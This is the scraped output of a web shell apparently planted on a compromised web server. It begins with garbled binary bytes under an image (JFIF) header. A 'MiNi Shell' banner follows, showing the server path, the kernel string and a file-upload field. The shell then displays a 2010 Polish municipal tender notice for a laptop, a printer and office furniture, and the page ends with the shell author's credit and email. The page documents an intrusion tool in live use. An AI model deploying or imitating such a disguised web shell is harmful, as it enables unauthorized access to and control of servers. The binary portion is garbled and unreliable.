JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100315/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100315/55993-N-2010.html

<p class="kh_header"><b>Międzyrzec Podlaski: Zakup sprzętu komputerowego z oprogramowaniem i wyposażenie biura projektu</b><br>
<b>Numer ogłoszenia: 55993 - 2010; data zamieszczenia: 15.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Międzyrzec Podlaski , ul. Pocztowa 8, 21-560 Międzyrzec Podlaski, woj. lubelskie, tel. 083 3717789, faks 083 3717790.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.miedzyrzec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup sprzętu komputerowego z oprogramowaniem i wyposażenie biura projektu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostarczenie komputera przenośnego z oprogramowaniem, dostarczenie drukarki kolorowej laserowej i mebli biurowych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.23.21.10-8, 30.21.31.00-6, 48.62.00.00-8, 48.31.00.00-4, 39.13.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;">opis urządzeń technicznych, instrukcję obsługi oraz środków stosowanych przez wykonawcę dostaw lub usług oraz opis zaplecza naukowo-badawczego wykonawcy, w celu potwierdzenia zapewnienia odpowiedniej jakości realizowanego zamówienia</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.miedzyrzec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Międzyrzec Podlaski, ul. Pocztowa 8, 21-560 Międzyrzec Podlaski, pok. 4 w dniach poniedziałek ÷ piątek w godz. 9:00 ÷ 14:00..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.03.2010 godzina 11:00, miejsce: Urząd Miasta Międzyrzec Podlaski, ul. Pocztowa 8, 21-560 Międzyrzec Podlaski, pok. 22.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Inwestycja finansowana w ramach Programu Operacyjnego Rozwój Polski Wschodniej 2007 - 2013 Osi priorytetowej I Nowoczesna Gospodarka,  Działanie 1.3 Wsparcie innowacji.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostarczenie komputera przenośnego z oprogramowaniem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Chipset - Intel PM45 Express. 
2. Kolor pokrywy - czarny.
3. Procesor: Procesor Intel Core 2 Duo T9600, prod. Intel, zegar min. 2,8 GHz, dwurdzeniowy; Pamięć podręczna L2 - min. 6 MB; magagistrala systemowa- min. 1066 MHz.
4. Pamięć:Rozmiar pamięci - min. 4 GB; Szybkość pamięci - min. 800 MHz; typ pamięci - DDR2 SDRAM (2x2GB); Obsługiwana pamięć - min. 8 GB.
5. Napędy: Twardy dysk -  min. 1000 GB, serial ATA, o szybkości min. 5400 obr./min; Napęd optyczny - wbudowany napęd Blu-ray: BD-R/-RE/-ROM / DVD+RW / +-R DL / RAM.
6. Wyświetlacz: Typ ekranu - o przekątnej min. 18,4 cala, typu LCD z wieloma lampami, rozdzielczości Full HD min. 1920 x 1080, współczynniku kształtu obrazu - 16:9. 
7. Grafika: Karta graficzna - NVIDIA GeForce 9600M GT o dostępnej pamięci graficznej około 2280 MB i min. 512 MB własnej pamięci wideo GDDR3.
8. Fabrycznie zintegrowane porty i interfejsy: 4-pinowe złącze typu Fre Wire bez zasilania odbiornika o prędkości min. 400Mb/s, wejście zasilacza, gniazdo karty pamięci Memory Stick z szybką transmisją danych i MagicGate; Gniazdo mikrofonowe (stereo); Bezpośredni port RJ-45 (sieć); Szybkość magistrali USB - High/Full/Low; Porty USB - min.  3 szt. o standardzie min. 2.0, typu A; Złącze monitora VGA - min. 1 szt; Gniado na karty SD - min. 1 szt; Gniazdo na karty CF - min. 1 szt; Wyjście audio - min. 2 szt. Typ(y) wyjścia audio - gniazdo słuchawek/głośników i gniazdo optyczne S/PDIF; Wyjście HDMI - min. 1 szt., Gniazdo Express Card - min. 1 szt, typu 34 mm.
9. Podłączanie: Zintegrowana sieć bezprzewodowa; Zasięg bezprzewodowej sieci LAN-75-100 m; Bluetooth  - wersja min. 2.1 + EDR o zasięgu min. 10 m; Sieć LAN o szybkości transmisji danych 300 (RX) / 150 (TX) Mb/s; Sieć Ethernet - 10 BASE-T / 100 BASE-T / 1000 BASE-T.
10.	Multimedia: Wbudowane głośniki stereo; Zgodność z systemem dźwięku Windows; Wbudowana kamera cyfrowa - min. 20 klatek na sekundę, przetwornik obrazu min. 1,3 mega pikseli, funkcja obrazu filmowego, Wbudowany mikrofon.
11.	Sekcja klawiatury: Klawiatura numeryczna, Touch Pad.
12.	Charakterystyka: Przyciski: zasilania, przełącznik sieci bezprzewodowej, wyciszanie, regulacja głośności, tryb AV, przyciski odtwarzania / pauzy i zatrzymania, przycisk wysuwania; Automatyczne zmienianie rozdzielczości - Standard Pług and Display; Blokada Kensington; Bezpieczeństwo i inne - odzyskiwanie danych z twardego dysku (ukryta partycja), 
13.	Dostarczane wyposażenie: Zasilacz sieciowy; Bateria - akumulator litowy (VGP-BPS13/S) o żywotności min. 115 minut i czasie ładowania do 240 minut;Przewód zasilający; Torba do notebooka zapinana na suwak z trwałego i trudno brudzącego się materiału w kolorze czarnym lub szarym.
14.	Oprogramowanie: Windows 7 Ultimate OEM 64 bit - 1 szt; Office 2007 Profesional OEM PL - 1 szt; Auto Cad LT 2010 - 1 szt.
15.	Okres i warunki gwarancji: minimum 24 miesiące z opcją zachowania nośnika (dysku twardego) w przypadku jego awarii.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.21.31.00-6, 48.62.00.00-8, 48.31.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostarczenie drukarki kolorowej laserowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Obsługiwane formaty nośników - A3, A4, A5, B4-JIS, B5-JIS;
2. Druk dwustronny - automatyczny (standardowo);
3. Nośniki - Papier (zwykły, cienki, średni, gruby, bardzo gruby, błyszczący - glossy i heavy glossy, do druku obrazów z wysokim połyskiem, odporny na rozrywanie, wtórnego przerobu), koperty, przeźrocza, etykiety, kartony;
4.	Prędkość druku w czerni (tryb normal, dla formatu A4) - min. 25stron;
5.	Prędkość druku w kolorze  (tryb normal, dla formatu A4) - min. 25 stron;
6.	Jakość druku w czerni (tryb best) - min. 600 x 600 dpi;
7.	Jakość druku w kolorze (tryb best) - min. 600 x 600 dpi;
8.	Technologia druku - technologia kolorowego druku laserowego in-line, bezpośrednie nanoszenie tonera na stronę;
9.	 Normatywny cykl pracy (miesięcznie, dla formatu A4) - min. 10000 stron; 
10.	Standardowa pamięć -  min. 160 MB;
11.	Szybkość procesora - min. 533 MHz;
12.	Pojemność dysku twardego - min. 20 GB;
13.	Liczba podajników papieru - min. 2;
14.	Podajnik papieru - uniwersalny podajnik na  min. 100 arkuszy, podajnik papieru na  min. 500 arkuszy, automatyczny moduł druku dwustronnego;
15.	Odbiornik papieru -min. 250 arkuszy;
16.	Wymiary (szer. x głęb. x wys.) - 550-580 x 700-750 x 600-650 mm; 
17.	Waga produktu - max. 70 kg;
18.	Obsługiwane systemy operacyjne - System Microsoft Windows2000, XP Professional, Windows 7, Windows Server 2003 (32- lub 64-bitowy); 
19.	Kabel USB - min. 2,0 m; 
20.	Kabel zasilający;
21.	Dodatkowe tonery w zestawie -  1 kpl wkładów drukujących (czarny, błękitny, purpurowy, żółty) oprócz tonerów startowych;
22.	Okres i warunki gwarancji: minimum 24 miesiące z opcją serwisu w ciągu 24 godz. przez okres pierwszych 12 m-cy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.21.10-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostarczenie mebli biurowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I. Szafa metalowa na  mapy w formacie A1 - 1 szt;
1. format map - A 1 (594x841mm);
2.  liczba szuflad - 10-12 szt;
3. wymiar szuflady  - szerokość - 860-900 mm;
                                   głębokość - 630-670 mm;
                                   wysokość - 65-70 mm;
4. wymiary szafy - szerokość - 950-1000 mm;
                               głębokość - 780-800 mm;
                                wysokość - 860-900 mm;
5. materiał  - metalowa;
6. grubość blachy - 06-2,5 mm;
7. kolor - jasny popiel;
8. farba - proszkowa (epoksydowo- poliestrowa);
9. wysuwanie szuflad na prowadnicach z łożyskami kulkowymi i blokadą zabezpieczającą przed wypadnięciem;
10. zamknięcie - centralny zamek  na klucz;
11. maksymalny ciężar - 140 kg;
12 gwarancja - min. 24 miesiące;
II. Szafa metalowa żaluzjowa - 1 szt.;
1. wymiary szafy - szerokość - 950-1200 mm;
                               głębokość - 400-500 mm;
                                wysokość - 1900-2000 mm;
2. materiał - metalowa;
3. grubość blachy - 0.8-2 mm;
4. kolor - jasny popiel;
5. farba - proszkowa (epoksydowo- poliestrowa);
6. liczba półek - 4-6 szt.;
7. nośność półek min. 50 kg;
7. możliwość przestawiania półek co 80-100 mm;
8. drzwi - żaluzjowe, otwierane poziomo całkowicie chowane w  korpusie mapy;
9. korpus z podwójnej blachy;
10. zamknięcie - centralny zamek  na klucz;
11. maksymalny ciężar - 70 kg;
12. gwarancja - min. 24 miesiące;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com